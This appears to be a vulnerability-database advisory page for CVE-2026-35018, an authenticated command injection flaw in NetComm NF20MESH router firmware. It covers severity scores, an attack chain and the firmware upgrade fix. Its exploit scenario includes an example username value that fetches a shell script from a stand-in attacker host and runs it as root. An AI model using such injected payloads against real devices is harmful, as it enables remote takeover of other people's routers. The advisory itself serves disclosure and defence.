Skip to main content

NetComm NF20MESH EUVDEUVD-2026-38452

| CVE-2026-35018 HIGH
OS Command Injection (CWE-78)
2026-06-23 VulnCheck GHSA-jqc2-w244-p56p
8.7
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-accessible exploitation (AV:N) requires low-privilege authentication (PR:L); root-level command execution yields full C:H/I:H/A:H with no scope change beyond the device.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jun 23, 2026 - 15:04 vuln.today

DescriptionCVE.org

NetComm NF20MESH routers running firmware R6B031 and earlier contain an authenticated remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands as root by injecting shell metacharacters into the username JSON parameter processed by the dalStorage_addUserAccount function. Attackers can exploit the unsafe concatenation of user-supplied input into a shell command string passed to rut_doSystemAction without sanitization to achieve full root-level command execution on the underlying operating system.

AnalysisAI

Authenticated remote code execution in NetComm NF20MESH routers running firmware R6B031 and earlier allows low-privileged authenticated attackers to gain full root-level OS control via OS command injection. The dalStorage_addUserAccount function unsafely concatenates attacker-supplied JSON username input into a shell command string executed by rut_doSystemAction without sanitization, enabling shell metacharacter injection. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain valid router credentials
Delivery
Authenticate to management interface over network
Exploit
Craft JSON request with shell metacharacters in username field
Execution
dalStorage_addUserAccount unsafely concatenates input
Persist
rut_doSystemAction executes injected payload as root
Impact
Full OS compromise achieved

Vulnerability AssessmentAI

Exploitation Exploitation requires valid authentication credentials to the NF20MESH management interface (CVSS PR:L confirmed). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 8.7 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) accurately reflects the threat profile: network-accessible, low complexity, no user interaction, and full triad impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained valid router credentials - via default credential reuse, credential stuffing, or prior phishing - authenticates to the NF20MESH management interface over the network. They craft a JSON request targeting the user account creation endpoint with a username field containing shell metacharacters (e.g., a value such as 'admin; curl attacker.com/shell.sh | sh') that, when unsafely concatenated in dalStorage_addUserAccount and passed to rut_doSystemAction, causes the router to execute the injected commands as root, resulting in full persistent device compromise.
Remediation Upgrade affected NF20MESH devices to firmware R6B032 or later, available from the NetComm firmware portal at https://support.netcommwireless.com/products/nf20mesh#Firmware; release notes are documented at the vendor reference https://support.netcommwireless.com/api/Media/Firmware/4407c21d-e990-49a4-9754-b72475f20c76?Product=NF20MESH%20Release%20Notes.pdf. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify and document all NetComm NF20MESH deployments, noting current firmware versions. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-38452 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy